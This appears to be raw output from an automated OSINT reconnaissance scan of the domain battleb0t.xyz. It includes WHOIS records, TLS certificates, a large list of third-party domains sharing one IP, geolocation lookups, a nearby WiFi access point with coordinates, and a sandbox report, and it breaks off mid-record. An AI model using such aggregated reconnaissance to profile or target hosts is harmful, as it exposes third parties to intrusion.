| 2023-05-12 03:33:39 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx | https://pics.battleb0t.xyz/images/nwp.PNG |
| 2023-05-12 03:33:43 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | "Exif | https://pics.battleb0t.xyz/images/random_3.jpg |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | China | 00ffcc.cn |
| 2023-05-12 03:21:07 | Malicious IP on Same Subnet | Yes | Emerging Threats | 0 | 0 | 4 | 0 | None | emergingthreats.net [46.101.128.0/17]
https://rules.emergingthreats.net/blockrules/compromised-ips.txt | 46.101.128.0/17 |
| 2023-05-12 02:44:06 | Domain Whois | No | Whois | 15 | 0 | 1 | 0 | None | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
| battleb0t.xyz |
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | malsup.github.io | 185.199.109.153 |
| 2023-05-12 02:54:41 | Raw Data from RIRs | No | Censys | 0 | 0 | 3 | 0 | None | {"last_updated_at": "2023-05-12T01:05:57.807Z", "ip": "104.196.30.220", "location_updated_at": "2023-05-02T18:59:17.407146Z", "autonomous_system_updated_at": "2023-05-02T18:59:17.407518Z", "location": {"province": "South Carolina", "city": "North Charleston", "country": "United States", "coordinates": {"latitude": 32.8929, "longitude": -80.0458}, "postal_code": "29418", "country_code": "US", "timezone": "America/New_York", "continent": "North America"}, "dns": {"records": {"serchservice.com": {"record_type": "A", "resolved_at": "2023-04-03T15:50:30.214978872Z"}, "www.wash.aczgroup.eu": {"record_type": "CNAME", "resolved_at": "2022-12-24T14:36:37.278010953Z"}, "kx-uat.roslin.app": {"record_type": "CNAME", "resolved_at": "2023-02-15T12:07:03.906401331Z"}, "tonysports.panel.pretii.lat": {"record_type": "CNAME", "resolved_at": "2023-01-09T15:20:03.375902235Z"}, "www.thestyladavinci.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T22:32:02.762915401Z"}, "mrivera.dev": {"record_type": "A", "resolved_at": "2023-02-28T15:51:09.820120890Z"}, "www.nickreid.com": {"record_type": "CNAME", "resolved_at": "2023-02-04T13:47:12.869307138Z"}, "www.lamina.glass": {"record_type": "CNAME", "resolved_at": "2023-03-08T16:12:21.973068103Z"}, "www.kks110.com": {"record_type": "CNAME", "resolved_at": "2023-03-19T14:04:31.895403615Z"}, "jayceecard.com": {"record_type": "A", "resolved_at": "2023-04-14T19:00:35.829641836Z"}, "whitmansolutions.com": {"record_type": "A", "resolved_at": "2023-04-27T07:30:19.997063406Z"}, "www.watthub.ca": {"record_type": "A", "resolved_at": "2023-03-06T12:43:12.904404257Z"}, "sg-web.karibu.com": {"record_type": "CNAME", "resolved_at": "2023-04-24T15:01:24.181601886Z"}, "pedantic-shockley-9911be.netlify.com": {"record_type": "A", "resolved_at": "2023-03-20T22:11:55.426310736Z"}, "tong315.com": {"record_type": "A", "resolved_at": "2023-01-12T13:58:08.172576533Z"}, 
"johnmulliganportfolio.com": {"record_type": "A", "resolved_at": "2022-11-11T13:23:19.387716434Z"}, "www.stellardeveloper.in": {"record_type": "CNAME", "resolved_at": "2023-02-16T16:36:42.499736344Z"}, "bloomerly.app": {"record_type": "A", "resolved_at": "2022-12-25T12:05:25.788489726Z"}, "francotorres.dev": {"record_type": "A", "resolved_at": "2023-01-14T14:40:08.721824931Z"}, "www.coreygo.com": {"record_type": "CNAME", "resolved_at": "2023-02-06T10:58:57.722319814Z"}, "www.antofredric.com": {"record_type": "CNAME", "resolved_at": "2022-10-17T16:40:40.245190254Z"}, "huynhmy.com": {"record_type": "A", "resolved_at": "2022-10-18T04:53:14.149659491Z"}, "www.trachtenverein-mainburg.de": {"record_type": "CNAME", "resolved_at": "2023-02-11T10:49:31.548109948Z"}, "apefootball.io": {"record_type": "A", "resolved_at": "2022-12-03T15:07:17.123487364Z"}, "deltafox.online": {"record_type": "A", "resolved_at": "2023-03-14T03:21:49.003492443Z"}, "gogogoyou.netlify.app": {"record_type": "A", "resolved_at": "2023-02-05T12:05:19.280143581Z"}, "delivermegoodies.com": {"record_type": "A", "resolved_at": "2023-03-26T15:00:31.047791856Z"}, "stucco.mx": {"record_type": "A", "resolved_at": "2023-01-22T15:23:26.371682923Z"}, "www.codingwithvikram.com": {"record_type": "CNAME", "resolved_at": "2022-10-17T17:38:28.994673827Z"}, "frikicine.com": {"record_type": "A", "resolved_at": "2023-04-05T14:42:25.627990678Z"}, "wisdomwords.in": {"record_type": "A", "resolved_at": "2023-04-27T18:51:48.245769853Z"}, "www.piotrkazmierczak.com": {"record_type": "CNAME", "resolved_at": "2022-10-17T16:47:55.717225282Z"}, "www.joshfinnie.com": {"record_type": "CNAME", "resolved_at": "2022-10-01T13:18:40.718964312Z"}, "glyphish.com": {"record_type": "A", "resolved_at": "2022-12-09T13:22:50.649811134Z"}, "earlytrade-app-staging.netlify.com": {"record_type": "A", "resolved_at": "2023-01-19T13:29:33.856736752Z"}, "beta.audendo.com": {"record_type": "CNAME", "resolved_at": "2023-03-26T19:41:04.004238284Z"}, 
"fuegos.ar": {"record_type": "A", "resolved_at": "2023-01-30T12:07:11.183950039Z"}, "www.ianmackenzie.dev": {"record_type": "CNAME", "resolved_at": "2023-04-10T17:28:23.534587630Z"}, "andyotter.com": {"record_type": "A", "resolved_at": "2023-04-15T13:42:19.149978491Z"}, "www.jazbogross.com": {"record_type": "CNAME", "resolved_at": "2023-01-29T13:39:11.151551213Z"}, "rumblewood.com": {"record_type": "A", "resolved_at": "2022-10-17T15:51:32.655397110Z"}, "alimonapour.me": {"record_type": "A", "resolved_at": "2022-10-17T18:09:13.464783579Z"}, "mashga.me": {"record_type": "A", "resolved_at": "2023-03-10T00:45:44.484928885Z"}, "okylocky.com": {"record_type": "A", "resolved_at": "2023-04-18T13:08:21.338492626Z"}, "acase.cc": {"record_type": "A", "resolved_at": "2023-04-11T13:04:31.164199944Z"}, "rafagarces.com": {"record_type": "A", "resolved_at": "2023-04-18T15:21:49.838203990Z"}, "www.joseemariane.com": {"record_type": "CNAME", "resolved_at": "2022-10-06T13:35:27.344852169Z"}, "suspicious-northcutt-ea8cde.netlify.app": {"record_type": "A", "resolved_at": "2023-01-29T12:06:14.806823826Z"}, "clearkit.netlify.app": {"record_type": "A", "resolved_at": "2022-12-17T12:05:48.247336458Z"}, "www.spartanthrift.com": {"record_type": "CNAME", "resolved_at": "2023-01-21T14:08:45.073081401Z"}, "standupexcusegenerator.com": {"record_type": "A", "resolved_at": "2023-04-25T16:15:30.932304918Z"}, "allianz-osn.demo.hubtype.com": {"record_type": "CNAME", "resolved_at": "2023-03-06T14:19:47.550585954Z"}, "tech.joshnotes.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T15:39:08.160206214Z"}, "relooki.ma": {"record_type": "A", "resolved_at": "2023-01-09T15:22:11.025369046Z"}, "k1patel.com": {"record_type": "A", "resolved_at": "2022-10-06T13:35:56.488860522Z"}, "cesarvarela.com": {"record_type": "A", "resolved_at": "2023-01-23T13:07:01.795663799Z"}, "thunderous-pegasus-22c0db.netlify.app": {"record_type": "A", "resolved_at": "2023-02-03T12:05:48.649555661Z"}, "saranshvaid.com": 
{"record_type": "A", "resolved_at": "2022-10-17T16:20:11.681803937Z"}, "cani.hceris.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T23:04:57.283193315Z"}, "www.diverselab.info": {"record_type": "CNAME", "resolved_at": "2023-05-08T18:12:06.613215851Z"}, "wanda-blog.netlify.app": {"record_type": "A", "resolved_at": "2023-03-20T18:06:26.124263705Z"}, "justfreecode.com": {"record_type": "A", "resolved_at": "2023-03-29T06:06:29.982491579Z"}, "www.fest.i.ng": {"record_type": "CNAME", "resolved_at": "2023-04-13T19:40:09.807661140Z"}, "www.airbear.ai": {"record_type": "CNAME", "resolved_at": "2022-10-17T16:31:17.366816569Z"}, "nft-master.io": {"record_type": "A", "resolved_at": "2023-03-22T15:36:21.474841579Z"}, "www.kkeisuke.com": {"record_type": "CNAME", "resolved_at": "2022-10-17T17:52:54.022773401Z"}, "www.irinasucoverschi.com": {"record_type": "A", "resolved_at": "2023-02-11T13:36:16.416115769Z"}, "match.catacomb.cloud": {"record_type": "CNAME", "resolved_at": "2023-04-03T13:01:33.557249725Z"}, "allmightyclub.com": {"record_type": "A", "resolved_at": "2023-04-14T13:25:00.206855801Z"}, "fancy-taiyaki-def320.netlify.app": {"record_type": "A", "resolved_at": "2023-03-20T18:09:41.008114725Z"}, "pelemijo.tukuyok.net": {"record_type": "CNAME", "resolved_at": "2023-04-15T19:59:43.965739973Z"}, "sandrarubinstein.com.au": {"record_type": "A", "resolved_at": "2023-03-29T20:53:34.264063598Z"}, "mint-nyolings.io": {"record_type": "A", "resolved_at": "2022-10-17T17:56:07.078920687Z"}, "workshop.thecustomeristhehero.com": {"record_type": "CNAME", "resolved_at": "2023-02-08T15:49:56.171673454Z"}, "sustainableearthworks.au": {"record_type": "A", "resolved_at": "2023-03-11T12:16:53.147174398Z"}, "charliescollectibleshow.com": {"record_type": "A", "resolved_at": "2023-03-23T14:52:04.137501408Z"}, "ghost.joeczubiak.com": {"record_type": "A", "resolved_at": "2023-03-23T15:38:46.631800177Z"}, "www.abraham-designs.com": {"record_type": "CNAME", "resolved_at": 
"2023-04-02T13:19:50.321816323Z"}, "ethanpieniazek.com": {"record_type": "A", "resolved_at": "2022-12-24T13:17:39.518830299Z"}, "topwalkingtoursportugal.com": {"record_type": "A", "resolved_at": "2023-03-28T16:24:18.145873463Z"}, "pavanaditya.com": {"record_type": "A", "resolved_at": "2022-10-17T15:44:46.924686856Z"}, "hotel-silverstar.com": {"record_type": "A", "resolved_at": "2022-12-07T13:42:01.027274847Z"}, "alfonzoweb.tech": {"record_type": "A", "resolved_at": "2022-10-17T16:48:17.755742508Z"}, "felkeszito.com": {"record_type": "A", "resolved_at": "2023-02-19T14:00:29.453539558Z"}, "www.hotflashheatwave.com": {"record_type": "CNAME", "resolved_at": "2023-04-07T00:45:16.120624048Z"}, "circleci-deploy.tutorials.symops.com": {"record_type": "CNAME", "resolved_at": "2023-04-14T20:11:00.799705049Z"}, "mint.wagmiunited.com": {"record_type": "A", "resolved_at": "2022-12-31T14:35:50.440390656Z"}, "ivc-app-staging.mindsetmedical.com": {"record_type": "CNAME", "resolved_at": "2023-04-27T15:51:19.056715744Z"}, "46681.info": {"record_type": "A", "resolved_at": "2023-01-05T15:08:14.969970747Z"}, "stephenkennicutt.com": {"record_type": "A", "resolved_at": "2022-10-17T16:37:17.676643859Z"}, "anime.guilherr.me": {"record_type": "CNAME", "resolved_at": "2022-11-20T15:22:11.384286829Z"}, "clustertool.lionz.biz": {"record_type": "CNAME", "resolved_at": "2022-11-02T12:20:02.594560408Z"}, "vajm.me": {"record_type": "A", "resolved_at": "2023-01-12T14:51:55.272145425Z"}, "www.iannoble.co.uk": {"record_type": "CNAME", "resolved_at": "2022-12-05T17:12:09.872956366Z"}, "boosters.elaniin.dev": {"record_type": "CNAME", "resolved_at": "2022-10-17T18:26:52.217262563Z"}, "www.starkdex.io": {"record_type": "CNAME", "resolved_at": "2023-04-14T22:10:45.403164762Z"}, "julietrubin.com": {"record_type": "A", "resolved_at": "2023-01-21T13:32:04.561723552Z"}, "icons.bbsitting.fr": {"record_type": "CNAME", "resolved_at": "2023-05-08T17:44:09.556998287Z"}, "www.trace.events": {"record_type": "CNAME", 
"resolved_at": "2023-04-27T18:19:39.404025377Z"}, "vitalpal.ca": {"record_type": "A", "resolved_at": "2023-03-20T17:13:36.160426979Z"}}, "names": ["frikicine.com", "kx-uat.roslin.app", "www.lamina.glass", "stucco.mx", "pelemijo.tukuyok.net", "ghost.joeczubiak.com", "wanda-blog.netlify.app", "alimonapour.me", "allmightyclub.com", "mint-nyolings.io", "francotorres.de | 104.196.30.220 |
| 2023-05-12 02:45:21 | Physical Location | No | ipapi.co | 0 | 0 | 4 | 0 | None | Ashburn, Virginia, VA, United States, US | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | hhcpatp (Net ID: 00:06:25:3B:8E:16) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:30 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 2 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://nuke.battleb0t.xyz', u'http_status': 521, u'plugins': {u'HTTPServer': {u'string': [u'cloudflare']}, u'Script': {}, u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'Title': {u'string': [u'nuke.battleb0t.xyz | 521: Web server is down']}, u'HTML5': {}, u'UncommonHeaders': {u'string': [u'referrer-policy,cf-ray']}, u'IP': {u'string': [u'172.64.80.1']}, u'X-Frame-Options': {u'string': [u'SAMEORIGIN']}, u'X-UA-Compatible': {u'string': [u'IE=Edge']}}}, {}] | nuke.battleb0t.xyz |
| 2023-05-12 02:56:58 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | www.ayhu.xyz | [{"url": "https://www.ayhu.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://www.ayhu.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 02:44:24 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 13 13:52:05.336 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:57:F9:C2:75:97:36:8B:12:D4:C1:E7:CA:
50:E7:70:49:3E:19:7B:CF:6E:2E:B2:32:0A:7B:AB:5D:
31:9F:A6:29:02:21:00:A5:FD:E1:03:A8:C4:49:20:AF:
46:1D:1E:50:E3:8E:07:43:7A:DC:16:22:84:DD:F5:8B:
28:06:E9:91:CB:AE:41
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 13 13:52:05.327 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:EA:4C:FF:35:E1:97:F0:36:1E:40:22:
0D:44:8D:BA:C6:F1:8F:73:35:1F:B7:67:97:EA:2B:1B:
FC:27:7F:33:02:21:00:81:59:F8:29:60:75:D8:8F:00:
60:06:8E:9A:65:C6:5E:93:57:7E:5C:BF:B5:78:29:4F:
6F:C1:3B:97:29:1D:C7
Signature Algorithm: sha256WithRSAEncryption
24:d6:1b:d8:e4:8b:66:d1:df:e9:e2:97:93:78:a9:26:b8:6c:
f8:3c:98:90:50:e1:55:d7:91:ae:77:21:2c:40:df:85:16:56:
67:98:1c:b9:14:ca:43:24:bf:39:32:06:c7:fe:42:03:fa:45:
3b:3f:39:c5:26:88:13:e9:3d:1d:bc:bd:a1:0a:08:74:1a:3b:
e6:07:80:5b:f5:9a:21:ed:4a:45:40:ac:8a:6d:c1:de:40:12:
47:d5:33:88:6e:06:c5:32:a1:76:01:b1:50:fb:53:29:92:fa:
e1:03:af:88:12:00:9a:38:a5:9d:32:3e:46:8b:7c:f6:27:29:
ec:fa:85:68:fa:91:a6:95:c5:d7:a0:da:33:eb:03:cf:9c:a6:
c0:5c:0d:e8:d8:f8:03:5d:fb:9f:61:df:e1:a0:63:74:01:18:
4c:0d:17:f3:db:74:32:3c:fc:3b:44:24:e7:10:2b:f7:69:d2:
89:35:6f:e7:d7:11:5a:13:0a:a9:83:9e:0f:c2:f2:ea:d8:50:
30:65:9c:16:49:f6:30:d8:a2:e3:83:ff:5d:ff:00:a2:ff:57:
de:68:f4:70:90:a3:db:c8:9c:55:ce:ea:f6:4c:08:6a:01:70:
91:f9:f8:91:9d:f2:99:1f:be:06:10:87:53:07:83:04:df:62:
62:3f:1f:52
|
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | Netherlands | Amsterdam, North Holland, 1012, Netherlands, Europe |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | Montenegro | amcodev.me |
| 2023-05-12 02:44:19 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b6:39:33:af:de:1e:32:f3:fc:2e:76:dc:bc:08:51:86:10
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 25 01:39:25 2023 GMT
Not After : May 26 01:39:24 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 25 02:39:25.268 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:87:F6:3C:B2:E0:C2:7B:F4:59:32:49:
FF:84:EE:E1:AC:5D:A1:7E:84:DE:B8:AC:92:3B:97:98:
6D:C7:11:07:D0:02:21:00:8E:A1:79:1C:1F:BD:8E:15:
DE:AB:97:FE:40:E1:D9:C2:1C:3E:55:3D:39:DF:88:B8:
3E:30:32:EA:CF:51:A0:F3
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Feb 25 02:39:25.238 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:C0:CA:4A:3A:01:79:C5:F7:4D:18:6C:
70:E8:74:A4:FC:31:5E:46:FF:DB:BC:55:79:1C:6B:D3:
2A:77:33:92:7D:02:21:00:B3:6C:B3:CD:94:6E:40:07:
54:43:CE:33:E0:3F:C2:49:48:DC:19:23:44:E4:9D:8B:
7E:E1:7F:46:CE:18:EF:B6
Signature Algorithm: sha256WithRSAEncryption
b2:e3:a8:2c:e5:ba:7b:3e:8e:fb:de:05:c9:db:df:10:e1:3a:
4a:d4:c8:e9:16:76:31:31:b8:1d:87:e3:42:15:5c:d9:01:d1:
e3:21:14:96:0d:03:d6:ab:2a:bb:6e:da:97:10:fe:b1:03:48:
ab:7e:6d:7b:96:6d:e0:3a:5a:e9:94:2e:83:ae:3f:a8:a5:8c:
25:3a:a9:c5:1d:63:8a:0d:55:4d:54:c8:3a:17:d4:72:72:76:
78:9d:29:2a:3b:de:f5:0a:4c:d8:44:82:1f:1a:29:cc:5c:2c:
bf:7e:db:71:7c:50:e3:91:fe:95:3f:d3:87:5f:30:37:48:ec:
63:b6:a1:ac:33:ac:63:05:b2:8f:6d:ee:9e:2e:ac:50:59:e9:
41:46:d2:71:65:05:17:42:d9:3e:21:9d:d7:90:39:a6:8f:2d:
e8:4a:d4:ff:6d:9e:32:c6:82:05:8f:a4:b5:74:b4:70:df:28:
4b:50:c8:1b:36:1a:ae:cf:7b:ab:92:23:e6:77:97:f2:47:a4:
b0:52:f2:9d:cf:be:68:a2:8a:f2:2f:f0:66:0b:d3:34:2a:c7:
8a:35:c4:1c:33:2d:e5:90:de:56:a7:97:86:7c:97:c9:45:8f:
99:61:22:00:3d:aa:b2:87:0d:35:bb:4c:f3:f8:1c:f8:99:c1:
e8:d1:30:c6
| battleb0t.xyz |
| 2023-05-12 02:45:54 | Physical Location | No | AbstractAPI | 1 | 0 | 4 | 0 | None | Ashburn, Virginia, 20149, United States, North America | 2600:1f18:2489:8200::c8 |
| 2023-05-12 02:47:56 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/form.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/ie.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/ajax.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/fx_methods.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/deferred.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/zepto.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/data.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/gesture.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/selector.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/ios3.js', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 19, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://zeptojs.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:6976:304:WilStaging_02"\n "Local\\SM0:6976:304:WilStaging_02"\n "Local\\SM0:6976:120:WilError_01"\n "SM0:6976:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:80"\n "138.91.254.96:443"\n "185.199.110.153:443"\n "104.21.16.28:443"\n "192.30.255.116:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', 